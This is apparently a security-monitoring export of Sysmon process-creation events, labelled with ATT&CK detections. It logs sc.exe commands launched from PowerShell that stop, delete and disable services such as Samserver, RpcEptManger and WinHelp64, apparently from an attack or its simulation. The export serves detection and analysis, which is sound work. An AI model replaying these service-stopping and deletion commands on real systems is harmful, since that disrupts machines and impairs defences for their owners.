10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.598035700Z"",""eventRecordID"":""2674"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.596\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010de1c2100}\r\nProcessId: 6588\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.596"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010de1c2100}"",""processId"":""6588"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.806",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.549 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00104b1b2100} +ProcessId: 3460 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.551248900Z"",""eventRecordID"":""2672"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.549\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00104b1b2100}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.549"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00104b1b2100}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.791",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.533 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010841a2100} +ProcessId: 6824 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.535468100Z"",""eventRecordID"":""2671"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.533\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010841a2100}\r\nProcessId: 6824\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.533"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010841a2100}"",""processId"":""6824"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.744",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.480 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fd172100} +ProcessId: 2116 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.482396900Z"",""eventRecordID"":""2668"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.480\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fd172100}\r\nProcessId: 2116\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.480"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010fd172100}"",""processId"":""2116"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.407 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a3152100} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.410577300Z"",""eventRecordID"":""2665"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.407\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a3152100}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.407"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010a3152100}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.681",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.391 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010db142100} +ProcessId: 6112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Samserver Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Samserver Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.393383800Z"",""eventRecordID"":""2664"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.391\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010db142100}\r\nProcessId: 6112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Samserver Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.391"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010db142100}"",""processId"":""6112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Samserver Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.662",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.357 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00103e132100} +ProcessId: 5196 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 